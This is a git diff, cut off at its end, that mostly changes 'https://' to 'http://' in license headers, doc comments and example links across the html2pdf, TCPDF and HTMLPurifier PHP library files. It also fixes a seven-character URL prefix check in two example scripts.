a/html2pdf_v4.03/_tcpdf_5.0.002/fonts/utils/makefont.php b/html2pdf_v4.03/_tcpdf_5.0.002/fonts/utils/makefont.php index 5db84f6..b8ba2a9 100755 --- a/html2pdf_v4.03/_tcpdf_5.0.002/fonts/utils/makefont.php +++ b/html2pdf_v4.03/_tcpdf_5.0.002/fonts/utils/makefont.php @@ -4,7 +4,7 @@ // Begin : 2004-12-31 // Last Update : 2010-03-19 // Version : 1.2.006 -// License : GNU LGPL (https://www.gnu.org/copyleft/lesser.html) +// License : GNU LGPL (http://www.gnu.org/copyleft/lesser.html) // ---------------------------------------------------------------------------- // Copyright (C) 2008 Nicola Asuni - Tecnick.com S.r.l. // @@ -19,7 +19,7 @@ // GNU Lesser General Public License for more details. // // You should have received a copy of the GNU Lesser General Public License -// along with this program. If not, see <https://www.gnu.org/licenses/>. +// along with this program. If not, see <http://www.gnu.org/licenses/>. // // See LICENSE.TXT file for more information. // ---------------------------------------------------------------------------- @@ -43,8 +43,8 @@ * @author Nicola Asuni, Olivier Plathey, Steven Wittens * @copyright 2004-2008 Nicola Asuni - Tecnick.com S.r.l (www.tecnick.com) Via Della Pace, 11 - 09044 - Quartucciu (CA) - ITALY - www.tecnick.com - info@tecnick.com * @package com.tecnick.tcpdf - * @link https://www.tcpdf.org - * @license https://www.gnu.org/copyleft/lesser.html LGPL + * @link http://www.tcpdf.org + * @license http://www.gnu.org/copyleft/lesser.html LGPL */ /** diff --git a/html2pdf_v4.03/_tcpdf_5.0.002/fonts/utils/src/readme.txt b/html2pdf_v4.03/_tcpdf_5.0.002/fonts/utils/src/readme.txt index 4a34101..6e5b40d 100755 --- a/html2pdf_v4.03/_tcpdf_5.0.002/fonts/utils/src/readme.txt +++ b/html2pdf_v4.03/_tcpdf_5.0.002/fonts/utils/src/readme.txt @@ -3,8 +3,8 @@ font metrics from the font files and build the required tables using the utility TTF2UFM. TTF2UFM is a modified version of Mark Heath's TTF 2 PT1 converter -(https://ttf2pt1.sourceforge.net/) by Steven Wittens <steven@acko.net> -(https://www.acko.net/blog/ufpdf). That version has been further +(http://ttf2pt1.sourceforge.net/) by Steven Wittens <steven@acko.net> +(http://www.acko.net/blog/ufpdf). That version has been further modified by Ulrich Telle for use with the wxWidgets component wxPdfDocument. diff --git a/html2pdf_v4.03/_tcpdf_5.0.002/fonts/zarbold.php b/html2pdf_v4.03/_tcpdf_5.0.002/fonts/zarbold.php index 3a1e544..cbd95ae 100755 --- a/html2pdf_v4.03/_tcpdf_5.0.002/fonts/zarbold.php +++ b/html2pdf_v4.03/_tcpdf_5.0.002/fonts/zarbold.php @@ -1,7 +1,7 @@ <?php /* Mohammad Ali Golkar m.a.golkar@gmail.com - https://www.30minonline.com + http://www.30minonline.com LICENSE : GPLv2 */ $type='TrueTypeUnicode'; $name='ZarBold'; diff --git a/html2pdf_v4.03/_tcpdf_5.0.002/htmlcolors.php b/html2pdf_v4.03/_tcpdf_5.0.002/htmlcolors.php index f2b3d33..6893545 100755 --- a/html2pdf_v4.03/_tcpdf_5.0.002/htmlcolors.php +++ b/html2pdf_v4.03/_tcpdf_5.0.002/htmlcolors.php @@ -4,7 +4,7 @@ // Begin : 2002-04-09 // Last Update : 2010-04-20 // Version : 1.0.004 -// License : GNU LGPL (https://www.gnu.org/copyleft/lesser.html) +// License : GNU LGPL (http://www.gnu.org/copyleft/lesser.html) // ---------------------------------------------------------------------------- // Copyright (C) 2002-2009 Nicola Asuni - Tecnick.com S.r.l. // @@ -19,7 +19,7 @@ // GNU Lesser General Public License for more details. // // You should have received a copy of the GNU Lesser General Public License -// along with this program. If not, see <https://www.gnu.org/licenses/>. +// along with this program. If not, see <http://www.gnu.org/licenses/>. // // See LICENSE.TXT file for more information. // ---------------------------------------------------------------------------- @@ -43,8 +43,8 @@ * @author Nicola Asuni * @copyright 2004-2009 Nicola Asuni - Tecnick.com S.r.l (www.tecnick.com) Via Della Pace, 11 - 09044 - Quartucciu (CA) - ITALY - www.tecnick.com - info@tecnick.com * @package com.tecnick.tcpdf - * @link https://www.tcpdf.org - * @license https://www.gnu.org/copyleft/lesser.html LGPL + * @link http://www.tcpdf.org + * @license http://www.gnu.org/copyleft/lesser.html LGPL * @since 2.9.000 (2008-03-26) */ diff --git a/html2pdf_v4.03/_tcpdf_5.0.002/qrcode.php b/html2pdf_v4.03/_tcpdf_5.0.002/qrcode.php index 099b0a8..c1fad8b 100755 --- a/html2pdf_v4.03/_tcpdf_5.0.002/qrcode.php +++ b/html2pdf_v4.03/_tcpdf_5.0.002/qrcode.php @@ -4,7 +4,7 @@ // Begin : 2010-03-22 // Last Update : 2010-03-30 // Version : 1.0.003 -// License : GNU LGPL v.3 (https://www.gnu.org/copyleft/lesser.html) +// License : GNU LGPL v.3 (http://www.gnu.org/copyleft/lesser.html) // ---------------------------------------------------------------------------- // // This library is free software; you can redistribute it and/or @@ -20,7 +20,7 @@ // You should have received a copy of the GNU Lesser General Public // License along with this library; if not, write to the Free Software // Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA -// or browse https://www.gnu.org/copyleft/lesser.html +// or browse http://www.gnu.org/copyleft/lesser.html // // ---------------------------------------------------------------------------- // @@ -43,20 +43,20 @@ // "PHP QR Code encoder" // License: GNU-LGPLv3 // Copyright (C) 2010 by Dominik Dzienia <deltalab at poczta dot fm> -// https://phpqrcode.sourceforge.net/ +// http://phpqrcode.sourceforge.net/ // https://sourceforge.net/projects/phpqrcode/ // // The "PHP QR Code encoder" is based on // "C libqrencode library" (ver. 3.1.1) // License: GNU-LGPL 2.1 // Copyright (C) 2006-2010 by Kentaro Fukuchi -// https://megaui.net/fukuchi/works/qrencode/index.en.html +// http://megaui.net/fukuchi/works/qrencode/index.en.html // // Reed-Solomon code encoder is written by Phil Karn, KA9Q. // Copyright (C) 2002-2006 Phil Karn, KA9Q // // QR Code is registered trademark of DENSO WAVE INCORPORATED -// https://www.denso-wave.com/qrcode/index-e.html +// http://www.denso-wave.com/qrcode/index-e.html // --------------------------------------------------------- // // Author: Nicola Asuni @@ -78,15 +78,15 @@ * This class supports QR Code model 2, described in JIS (Japanese Industrial Standards) X0510:2004 or ISO/IEC 18004. * Currently the following features are not supported: ECI and FNC1 mode, Micro QR Code, QR Code model 1, Structured mode. * - * This class is derived from "PHP QR Code encoder" by Dominik Dzienia (https://phpqrcode.sourceforge.net/) based on "libqrencode C library 3.1.1." by Kentaro Fukuchi (https://megaui.net/fukuchi/works/qrencode/index.en.html), contains Reed-Solomon code written by Phil Karn, KA9Q. QR Code is registered trademark of DENSO WAVE INCORPORATED (https://www.denso-wave.com/qrcode/index-e.html). + * This class is derived from "PHP QR Code encoder" by Dominik Dzienia (http://phpqrcode.sourceforge.net/) based on "libqrencode C library 3.1.1." by Kentaro Fukuchi (http://megaui.net/fukuchi/works/qrencode/index.en.html), contains Reed-Solomon code written by Phil Karn, KA9Q. QR Code is registered trademark of DENSO WAVE INCORPORATED (http://www.denso-wave.com/qrcode/index-e.html). * Please read comments on this class source file for full copyright and license information. * * @package com.tecnick.tcpdf * @abstract Class for generating QR-code array for TCPDF. * @author Nicola Asuni * @copyright 2010 Nicola Asuni - Tecnick.com S.r.l (www.tecnick.com) Via Della Pace, 11 - 09044 - Quartucciu (CA) - ITALY - www.tecnick.com - info@tecnick.com - * @link https://www.tcpdf.org - * @license https://www.gnu.org/copyleft/lesser.html LGPL + * @link http://www.tcpdf.org + * @license http://www.gnu.org/copyleft/lesser.html LGPL * @version 1.0.003 */ @@ -293,7 +293,7 @@ if (!class_exists('QRcode', false)) { * This class supports QR Code model 2, described in JIS (Japanese Industrial Standards) X0510:2004 or ISO/IEC 18004. * Currently the following features are not supported: ECI and FNC1 mode, Micro QR Code, QR Code model 1, Structured mode. * - * This class is derived from "PHP QR Code encoder" by Dominik Dzienia (https://phpqrcode.sourceforge.net/) based on "libqrencode C library 3.1.1." by Kentaro Fukuchi (https://megaui.net/fukuchi/works/qrencode/index.en.html), contains Reed-Solomon code written by Phil Karn, KA9Q. QR Code is registered trademark of DENSO WAVE INCORPORATED (https://www.denso-wave.com/qrcode/index-e.html). + * This class is derived from "PHP QR Code encoder" by Dominik Dzienia (http://phpqrcode.sourceforge.net/) based on "libqrencode C library 3.1.1." by Kentaro Fukuchi (http://megaui.net/fukuchi/works/qrencode/index.en.html), contains Reed-Solomon code written by Phil Karn, KA9Q. QR Code is registered trademark of DENSO WAVE INCORPORATED (http://www.denso-wave.com/qrcode/index-e.html). * Please read comments on this class source file for full copyright and license information. * * @name QRcode @@ -301,8 +301,8 @@ if (!class_exists('QRcode', false)) { * @abstract Class for generating QR-code array for TCPDF. * @author Nicola Asuni * @copyright 2010 Nicola Asuni - Tecnick.com S.r.l (www.tecnick.com) Via Della Pace, 11 - 09044 - Quartucciu (CA) - ITALY - www.tecnick.com - info@tecnick.com - * @link https://www.tcpdf.org - * @license https://www.gnu.org/copyleft/lesser.html LGPL + * @link http://www.tcpdf.org + * @license http://www.gnu.org/copyleft/lesser.html LGPL * @version 1.0.002 */ class QRcode { diff --git a/html2pdf_v4.03/_tcpdf_5.0.002/tcpdf.php b/html2pdf_v4.03/_tcpdf_5.0.002/tcpdf.php index 720b363..33838da 100755 --- a/html2pdf_v4.03/_tcpdf_5.0.002/tcpdf.php +++ b/html2pdf_v4.03/_tcpdf_5.0.002/tcpdf.php @@ -3,9 +3,9 @@ // File name : tcpdf.php // Begin : 2002-08-03 // Last Update : 2010-05-06 -// Author : Nicola Asuni - info@tecnick.com - https://www.tcpdf.org +// Author : Nicola Asuni - info@tecnick.com - http://www.tcpdf.org // Version : 5.0.002 -// License : GNU LGPL (https://www.gnu.org/copyleft/lesser.html) +// License : GNU LGPL (http://www.gnu.org/copyleft/lesser.html) // ---------------------------------------------------------------------------- // Copyright (C) 2002-2010 Nicola Asuni - Tecnick.com S.r.l. // @@ -20,7 +20,7 @@ // GNU Lesser General Public License for more details. // // You should have received a copy of the GNU Lesser General Public License -// along with this program. If not, see <https://www.gnu.org/licenses/>. +// along with this program. If not, see <http://www.gnu.org/licenses/>. // // See LICENSE.TXT file for more information. // ---------------------------------------------------------------------------- @@ -30,7 +30,7 @@ // // NOTE: // This class was originally derived in 2002 from the Public -// Domain FPDF class by Olivier Plathey (https://www.fpdf.org), +// Domain FPDF class by Olivier Plathey (http://www.fpdf.org), // but now is almost entirely rewritten. // // Main features: @@ -40,7 +40,7 @@ // * TrueTypeUnicode, OpenTypeUnicode, TrueType, OpenType, Type1 and CID-0 fonts; // * methods to publish some XHTML code, Javascript and Forms; // * images, graphic (geometric figures) and transformation methods; -// * supports JPEG, PNG and SVG images natively, all images supported by GD (GD, GD2, GD2PART, GIF, JPEG, PNG, BMP, XBM, XPM) and all images supported via ImagMagick (https://www.imagemagick.org/www/formats.html) +// * supports JPEG, PNG and SVG images natively, all images supported by GD (GD, GD2, GD2PART, GIF, JPEG, PNG, BMP, XBM, XPM) and all images supported via ImagMagick (http://www.imagemagick.org/www/formats.html) // * 1D and 2D barcodes: CODE 39, ANSI MH10.8M-1983, USD-3, 3 of 9, CODE 93, USS-93, Standard 2 of 5, Interleaved 2 of 5, CODE 128 A/B/C, 2 and 5 Digits UPC-Based Extention, EAN 8, EAN 13, UPC-A, UPC-E, MSI, POSTNET, PLANET, RMS4CC (Royal Mail 4-state Customer Code), CBC (Customer Bar Code), KIX (Klant index - Customer index), Intelligent Mail Barcode, Onecode, USPS-B-3200, CODABAR, CODE 11, PHARMACODE, PHARMACODE TWO-TRACKS, QR-Code; // * Grayscale, RGB, CMYK, Spot Colors and Transparencies; // * automatic page header and footer management; @@ -59,9 +59,9 @@ // ----------------------------------------------------------- // THANKS TO: // -// Olivier Plathey (https://www.fpdf.org) for original FPDF. +// Olivier Plathey (http://www.fpdf.org) for original FPDF. // Efthimios Mavrogeorgiadis (emavro@yahoo.com) for suggestions on RTL language support. -// Klemen Vodopivec (https://www.fpdf.de/downloads/addons/37/) for Encryption algorithm. +// Klemen Vodopivec (http://www.fpdf.de/downloads/addons/37/) for Encryption algorithm. // Warren Sherliker (wsherliker@gmail.com) for better image handling. // dullus for text Justification. // Bob Vincent (pillarsdotnet@users.sourceforge.net) for <li> value attribute. @@ -90,7 +90,7 @@ /** * This is a PHP class for generating PDF documents without requiring external extensions.<br> - * TCPDF project (https://www.tcpdf.org) was originally derived in 2002 from the Public Domain FPDF class by Olivier Plathey (https://www.fpdf.org), but now is almost entirely rewritten.<br> + * TCPDF project (http://www.tcpdf.org) was originally derived in 2002 from the Public Domain FPDF class by Olivier Plathey (http://www.fpdf.org), but now is almost entirely rewritten.<br> * <h3>TCPDF main features are:</h3> * <ul> * <li>no external libraries are required for the basic functions;</li> @@ -99,7 +99,7 @@ * <li>TrueTypeUnicode, OpenTypeUnicode, TrueType, OpenType, Type1 and CID-0 fonts;</li> * <li>methods to publish some XHTML code, Javascript and Forms;</li> * <li>images, graphic (geometric figures) and transformation methods; - * <li>supports JPEG, PNG and SVG images natively, all images supported by GD (GD, GD2, GD2PART, GIF, JPEG, PNG, BMP, XBM, XPM) and all images supported via ImagMagick (https://www.imagemagick.org/www/formats.html)</li> + * <li>supports JPEG, PNG and SVG images natively, all images supported by GD (GD, GD2, GD2PART, GIF, JPEG, PNG, BMP, XBM, XPM) and all images supported via ImagMagick (http://www.imagemagick.org/www/formats.html)</li> * <li>1D and 2D barcodes: CODE 39, ANSI MH10.8M-1983, USD-3, 3 of 9, CODE 93, USS-93, Standard 2 of 5, Interleaved 2 of 5, CODE 128 A/B/C, 2 and 5 Digits UPC-Based Extention, EAN 8, EAN 13, UPC-A, UPC-E, MSI, POSTNET, PLANET, RMS4CC (Royal Mail 4-state Customer Code), CBC (Customer Bar Code), KIX (Klant index - Customer index), Intelligent Mail Barcode, Onecode, USPS-B-3200, CODABAR, CODE 11, PHARMACODE, PHARMACODE TWO-TRACKS, QR-Code;</li> * <li>Grayscale, RGB, CMYK, Spot Colors and Transparencies;</li> * <li>automatic page header and footer management;</li> @@ -120,8 +120,8 @@ * @abstract Class for generating PDF files on-the-fly without requiring external extensions. * @author Nicola Asuni * @copyright 2002-2010 Nicola Asuni - Tecnick.com S.r.l (www.tecnick.com) Via Della Pace, 11 - 09044 - Quartucciu (CA) - ITALY - www.tecnick.com - info@tecnick.com - * @link https://www.tcpdf.org - * @license https://www.gnu.org/copyleft/lesser.html LGPL + * @link http://www.tcpdf.org + * @license http://www.gnu.org/copyleft/lesser.html LGPL * @version 5.0.002 */ @@ -146,17 +146,17 @@ if (!class_exists('TCPDF', false)) { /** * define default PDF document producer */ - define('PDF_PRODUCER', 'TCPDF 5.0.002 (https://www.tcpdf.org)'); + define('PDF_PRODUCER', 'TCPDF 5.0.002 (http://www.tcpdf.org)'); /** * This is a PHP class for generating PDF documents without requiring external extensions.<br> - * TCPDF project (https://www.tcpdf.org) has been originally derived in 2002 from the Public Domain FPDF class by Olivier Plathey (https://www.fpdf.org), but now is almost entirely rewritten.<br> + * TCPDF project (http://www.tcpdf.org) has been originally derived in 2002 from the Public Domain FPDF class by Olivier Plathey (http://www.fpdf.org), but now is almost entirely rewritten.<br> * @name TCPDF * @package com.tecnick.tcpdf * @version 5.0.002 * @author Nicola Asuni - info@tecnick.com - * @link https://www.tcpdf.org - * @license https://www.gnu.org/copyleft/lesser.html LGPL + * @link http://www.tcpdf.org + * @license http://www.gnu.org/copyleft/lesser.html LGPL */ class TCPDF { @@ -8260,7 +8260,7 @@ if (!class_exists('TCPDF', false)) { /** * Converts UTF-8 strings to codepoints array.<br> * Invalid byte sequences will be replaced with 0xFFFD (replacement character)<br> - * Based on: https://www.faqs.org/rfcs/rfc3629.html + * Based on: http://www.faqs.org/rfcs/rfc3629.html * <pre> * Char. number range | UTF-8 octet sequence * (hexadecimal) | (binary) @@ -8451,7 +8451,7 @@ if (!class_exists('TCPDF', false)) { /** * Converts array of UTF-8 characters to UTF16-BE string.<br> - * Based on: https://www.faqs.org/rfcs/rfc2781.html + * Based on: http://www.faqs.org/rfcs/rfc2781.html * <pre> * Encoding UTF-16: * @@ -10015,7 +10015,7 @@ if (!class_exists('TCPDF', false)) { // BIDIRECTIONAL TEXT SECTION -------------------------- /** - * Reverse the RLT substrings using the Bidirectional Algorithm (https://unicode.org/reports/tr9/). + * Reverse the RLT substrings using the Bidirectional Algorithm (http://unicode.org/reports/tr9/). * @param string $str string to manipulate. * @param bool $setbom if true set the Byte Order Mark (BOM = 0xFEFF) * @param bool $forcertl if true forces RTL text direction @@ -10029,7 +10029,7 @@ if (!class_exists('TCPDF', false)) { } /** - * Reverse the RLT substrings array using the Bidirectional Algorithm (https://unicode.org/reports/tr9/). + * Reverse the RLT substrings array using the Bidirectional Algorithm (http://unicode.org/reports/tr9/). * @param array $arr array of unicode values. * @param string $str string to manipulate (or empty value). * @param bool $setbom if true set the Byte Order Mark (BOM = 0xFEFF) @@ -10044,7 +10044,7 @@ if (!class_exists('TCPDF', false)) { } /** - * Reverse the RLT substrings using the Bidirectional Algorithm (https://unicode.org/reports/tr9/). + * Reverse the RLT substrings using the Bidirectional Algorithm (http://unicode.org/reports/tr9/). * @param array $ta array of characters composing the string. * @param string $str string to process * @param bool $forcertl if 'R' forces RTL, if 'L' forces LTR @@ -18129,7 +18129,7 @@ if (!class_exists('TCPDF', false)) { /** * Returns an array of hyphenation patterns. - * @param string $file TEX file containing hypenation patterns. TEX pattrns can be downloaded from https://www.ctan.org/tex-archive/language/hyph-utf8/tex/generic/hyph-utf8/patterns/ + * @param string $file TEX file containing hypenation patterns. TEX pattrns can be downloaded from http://www.ctan.org/tex-archive/language/hyph-utf8/tex/generic/hyph-utf8/patterns/ * @return array of hyphenation patterns * @author Nicola Asuni * @since 4.9.012 (2010-04-12) @@ -18137,7 +18137,7 @@ if (!class_exists('TCPDF', false)) { */ public function getHyphenPatternsFromTEX($file) { // TEX patterns are available at: - // https://www.ctan.org/tex-archive/language/hyph-utf8/tex/generic/hyph-utf8/patterns/ + // http://www.ctan.org/tex-archive/language/hyph-utf8/tex/generic/hyph-utf8/patterns/ $data = file_get_contents($file); $patterns = array(); // remove comments @@ -18163,7 +18163,7 @@ if (!class_exists('TCPDF', false)) { /** * Returns text with soft hyphens. * @param string $text text to process - * @param mixed $patterns Array of hypenation patterns or a TEX file containing hypenation patterns. TEX patterns can be downloaded from https://www.ctan.org/tex-archive/language/hyph-utf8/tex/generic/hyph-utf8/patterns/ + * @param mixed $patterns Array of hypenation patterns or a TEX file containing hypenation patterns. TEX patterns can be downloaded from http://www.ctan.org/tex-archive/language/hyph-utf8/tex/generic/hyph-utf8/patterns/ * @param array $dictionary Array of words to be returned without applying the hyphenation algoritm. * @param int $leftmin Minimum number of character to leave on the left of the word without applying the hyphens. * @param int $rightmin Minimum number of character to leave on the right of the word without applying the hyphens. diff --git a/html2pdf_v4.03/_tcpdf_5.0.002/unicode_data.php b/html2pdf_v4.03/_tcpdf_5.0.002/unicode_data.php index 64cc06f..bba4bfb 100755 --- a/html2pdf_v4.03/_tcpdf_5.0.002/unicode_data.php +++ b/html2pdf_v4.03/_tcpdf_5.0.002/unicode_data.php @@ -3,7 +3,7 @@ // File name : unicode_data.php // Begin : 2008-01-01 // Last Update : 2009-08-17 -// License : GNU LGPL (https://www.gnu.org/copyleft/lesser.html) +// License : GNU LGPL (http://www.gnu.org/copyleft/lesser.html) // ---------------------------------------------------------------------------- // Copyright (C) 2002-2009 Nicola Asuni - Tecnick.com S.r.l. // @@ -18,7 +18,7 @@ // GNU Lesser General Public License for more details. // // You should have received a copy of the GNU Lesser General Public License -// along with this program. If not, see <https://www.gnu.org/licenses/>. +// along with this program. If not, see <http://www.gnu.org/licenses/>. // // See LICENSE.TXT file for more information. // ---------------------------------------------------------------------------- @@ -45,8 +45,8 @@ * @author Nicola Asuni * @copyright 2004-2009 Nicola Asuni - Tecnick.com S.r.l (www.tecnick.com) Via Della Pace, 11 - 09044 - Quartucciu (CA) - ITALY - www.tecnick.com - info@tecnick.com * @package com.tecnick.tcpdf - * @link https://www.tcpdf.org - * @license https://www.gnu.org/copyleft/lesser.html LGPL + * @link http://www.tcpdf.org + * @license http://www.gnu.org/copyleft/lesser.html LGPL * @since 2.1.000 (2008-01-08) */ @@ -98,7 +98,7 @@ define('K_RE_PATTERN_RTL', "/( /* * Pattern to test Arabic strings using regular expressions. - * source: https://www.w3.org/International/questions/qa-forms-utf-8 + * source: http://www.w3.org/International/questions/qa-forms-utf-8 */ define("K_RE_PATTERN_ARABIC", "/( \xD8[\x80-\x83\x8B\x8D\x9B\x9E\x9F\xA1-\xBA] # AL @@ -17852,7 +17852,7 @@ $unicode = array( /** * Mirror unicode characters. * For information on bidi mirroring, see UAX #9: Bidirectional Algorithm, - * at https://www.unicode.org/unicode/reports/tr9/ + * at http://www.unicode.org/unicode/reports/tr9/ */ global $unicode_mirror; $unicode_mirror = array ( diff --git a/html2pdf_v4.03/examples/exemple09.php b/html2pdf_v4.03/examples/exemple09.php index 67c725c..d5219b1 100755 --- a/html2pdf_v4.03/examples/exemple09.php +++ b/html2pdf_v4.03/examples/exemple09.php @@ -18,7 +18,7 @@ if ($generate) { ob_start(); } else { ?> -<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "https://www.w3.org/../htdocs4/loose.dtd"> +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/../htdocs4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="te../htdocs; charset=UTF-8" > @@ -29,8 +29,8 @@ if ($generate) { } $url = dirname($_SERVER['REQUEST_URI']).'/res/exemple09.png.php?px=5&py=20'; -if (substr($url, 0, 7)!=='https://') { - $url = 'https://'.$_SERVER['HTTP_HOST'].$url; +if (substr($url, 0, 7)!=='http://') { + $url = 'http://'.$_SERVER['HTTP_HOST'].$url; } ?> <br> diff --git a/html2pdf_v4.03/examples/res/about.php b/html2pdf_v4.03/examples/res/about.php index b897084..9e766b9 100755 --- a/html2pdf_v4.03/examples/res/about.php +++ b/html2pdf_v4.03/examples/res/about.php @@ -26,7 +26,7 @@ <table class="page_footer"> <tr> <td style="width: 33%; text-align: left;"> - https://html2pdf.fr/ + http://html2pdf.fr/ </td> <td style="width: 34%; text-align: center"> page [[page_cu]]/[[page_nb]] @@ -49,13 +49,13 @@ </div> <br><br><br><br><br> <div class="note"> - HTML2PDF est un convertisseur de code HTML vers PDF écrit en PHP5, utilisant la librairie <a href="https://tcpdf.org">TCPDF.</a><br> + HTML2PDF est un convertisseur de code HTML vers PDF écrit en PHP5, utilisant la librairie <a href="http://tcpdf.org">TCPDF.</a><br> <br> Il permet la conversion d'HTML et d'xHTML valide au format PDF, et est distribué sous licence LGPL.<br> <br> Cette librairie a été conçue pour gérer principalement les TABLE imbriquées afin de générer des factures, bon de livraison, et autres documents officiels.<br> <br> - Vous pouvez télécharger la dernière version de HTML2PDF ici : <a href="https://html2pdf.fr/">https://html2pdf.fr/</a>.<br> + Vous pouvez télécharger la dernière version de HTML2PDF ici : <a href="http://html2pdf.fr/">http://html2pdf.fr/</a>.<br> </div> </page> <page pageset="old"> @@ -71,7 +71,7 @@ </div> <br> <ul class="main"> - <li><a> : Ceci est un lien vers <a href="https://html2pdf.fr">le site de HTML2PDF</a></li> + <li><a> : Ceci est un lien vers <a href="http://html2pdf.fr">le site de HTML2PDF</a></li> <li><b>, <strong> : Ecrire en <b>gras</b>.</li> <li><big> : Ecrire plus <big>gros</big>.</li> <li><br> : Permet d'aller à la ligne</li> @@ -236,6 +236,6 @@ <li>Elle ne permet généralement pas la conversion directe d'une page HTML en PDF, ni la conversion du résultat d'un WYSIWYG en PDF.</li> <li>Cette librairie est là pour faciliter la génération de documents PDF, pas pour convertir n'importe quelle page HTML.</li> <li>Les formulaires ne marchent pas avec tous les viewers PDFs...</li> - <li>Lisez bien le wiki : <a href="https://wiki.spipu.net/doku.php?id=html2pdf:Accueil">https://wiki.spipu.net/doku.php?id=html2pdf:Accueil</a>.</li> + <li>Lisez bien le wiki : <a href="http://wiki.spipu.net/doku.php?id=html2pdf:Accueil">http://wiki.spipu.net/doku.php?id=html2pdf:Accueil</a>.</li> </ul> </page> \ No newline at end of file diff --git a/html2pdf_v4.03/examples/res/exemple00.php b/html2pdf_v4.03/examples/res/exemple00.php index 791db16..7bbcf28 100755 --- a/html2pdf_v4.03/examples/res/exemple00.php +++ b/html2pdf_v4.03/examples/res/exemple00.php @@ -14,7 +14,7 @@ Retours à la ligne autorisés : <br>, <br >, <br/>, <br /> <br /> <br> Barre horizontale <hr><hr style="height: 4mm; background: #AA5500; border: solid 1mm #0055AA"> - Exemple de lien : <a href="https://html2pdf.fr/" >le site HTML2PDF</a><br> + Exemple de lien : <a href="http://html2pdf.fr/" >le site HTML2PDF</a><br> <br> Image : <img src="./res/logo.gif" alt="Logo" width=150 /><br> <br> diff --git a/html2pdf_v4.03/examples/res/exemple10.php b/html2pdf_v4.03/examples/res/exemple10.php index e10e17e..fb7474e 100755 --- a/html2pdf_v4.03/examples/res/exemple10.php +++ b/html2pdf_v4.03/examples/res/exemple10.php @@ -109,12 +109,12 @@ div.main a:hover <div style="position: absolute; top: 5mm; left: 5mm; font-size:12pt;text-align: left;">Spipu.net</div><br> <div style="position: absolute; bottom: 5mm; right: 5mm; font-size:12pt; text-align: right; ">(c)2011 Spipu</div> <br><br><br> - <a href="https://cineblog.spipu.net/" >Cineblog by Spipu </a><br><br> - <a href="https://html2pdf.fr/" >HTML2PDF </a><br><br> - <a href="https://lambda.spipu.net/" >Lambda Finder </a><br><br> - <a href="https://open.spipu.net/" >Gestion des Opens - Yaronet </a><br><br> - <a href="https://perso.spipu.net/" >A propos de moi </a><br><br> - <a href="https://prgm.spipu.net/" >Programmes by Spipu </a><br><br> + <a href="http://cineblog.spipu.net/" >Cineblog by Spipu </a><br><br> + <a href="http://html2pdf.fr/" >HTML2PDF </a><br><br> + <a href="http://lambda.spipu.net/" >Lambda Finder </a><br><br> + <a href="http://open.spipu.net/" >Gestion des Opens - Yaronet </a><br><br> + <a href="http://perso.spipu.net/" >A propos de moi </a><br><br> + <a href="http://prgm.spipu.net/" >Programmes by Spipu </a><br><br> <br><br><br> </div> </page> \ No newline at end of file diff --git a/html2pdf_v4.03/examples/res/forms.php b/html2pdf_v4.03/examples/res/forms.php index 9497861..883ec03 100755 --- a/html2pdf_v4.03/examples/res/forms.php +++ b/html2pdf_v4.03/examples/res/forms.php @@ -1,7 +1,7 @@ <?php $url = $_SERVER['REQUEST_URI']; - if (substr($url, 0, 7)!=='https://') { - $url = 'https://'.$_SERVER['HTTP_HOST']; + if (substr($url, 0, 7)!=='http://') { + $url = 'http://'.$_SERVER['HTTP_HOST']; if (ISSET($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT']!=80) $url.= ':'.$_SERVER['SERVER_PORT']; $url.= $_SERVER['REQUEST_URI']; } diff --git a/html2pdf_v4.03/examples/res/svg.php b/html2pdf_v4.03/examples/res/svg.php index e685208..1324a7c 100755 --- a/html2pdf_v4.03/examples/res/svg.php +++ b/html2pdf_v4.03/examples/res/svg.php @@ -19,5 +19,5 @@ <br> Les balises SVG suivantes sont reconnues : LINE, RECT, CIRCLE, ELLIPSE, PATH, POLYGON, POLYLINE, G<br> <br> - Spécifications SVG : <a href="https://www.w3.org/TR/SVG11/expanded-toc.html">https://www.w3.org/TR/SVG11/expanded-toc.html</a> + Spécifications SVG : <a href="http://www.w3.org/TR/SVG11/expanded-toc.html">http://www.w3.org/TR/SVG11/expanded-toc.html</a> </page> \ No newline at end of file diff --git a/html2pdf_v4.03/html2pdf.class.php b/html2pdf_v4.03/html2pdf.class.php index 30bdb1a..1e7fdde 100755 --- a/html2pdf_v4.03/html2pdf.class.php +++ b/html2pdf_v4.03/html2pdf.class.php @@ -489,7 +489,7 @@ if (!defined('__CLASS_HTML2PDF__')) { $content = preg_replace('/<qrcode([^>]*)>/isU', '<hr>qrcode : $1<hr>', $content); $content = preg_replace('/<\/qrcode([^>]*)>/isU', '', $content); - echo '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "https://www.w3.org/TR/html4/loose.dtd"> + echo '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>'.HTML2PDF_locale::get('vue04').' HTML</title> diff --git a/htmlpurifier-4.10.0/Doxyfile b/htmlpurifier-4.10.0/Doxyfile index 8a5906c..c73d5d5 100755 --- a/htmlpurifier-4.10.0/Doxyfile +++ b/htmlpurifier-4.10.0/Doxyfile @@ -17,7 +17,7 @@ # This tag specifies the encoding used for all characters in the config file that # follow. The default is UTF-8 which is also the encoding used for all text before # the first occurrence of this tag. Doxygen uses libiconv (or the iconv built into -# libc) for the transcoding. See https://www.gnu.org/software/libiconv for the list of +# libc) for the transcoding. See http://www.gnu.org/software/libiconv for the list of # possible encodings. DOXYFILE_ENCODING = UTF-8 @@ -493,7 +493,7 @@ INPUT = ". " # This tag can be used to specify the character encoding of the source files that # doxygen parses. Internally doxygen uses the UTF-8 encoding, which is also the default # input encoding. Doxygen uses libiconv (or the iconv built into libc) for the transcoding. -# See https://www.gnu.org/software/libiconv for the list of possible encodings. +# See http://www.gnu.org/software/libiconv for the list of possible encodings. INPUT_ENCODING = UTF-8 @@ -646,7 +646,7 @@ REFERENCES_LINK_SOURCE = YES # If the USE_HTAGS tag is set to YES then the references to source code # will point to the HTML generated by the htags(1) tool instead of doxygen # built-in source browser. The htags tool is part of GNU's global source -# tagging system (see https://www.gnu.org/software/global/global.html). You +# tagging system (see 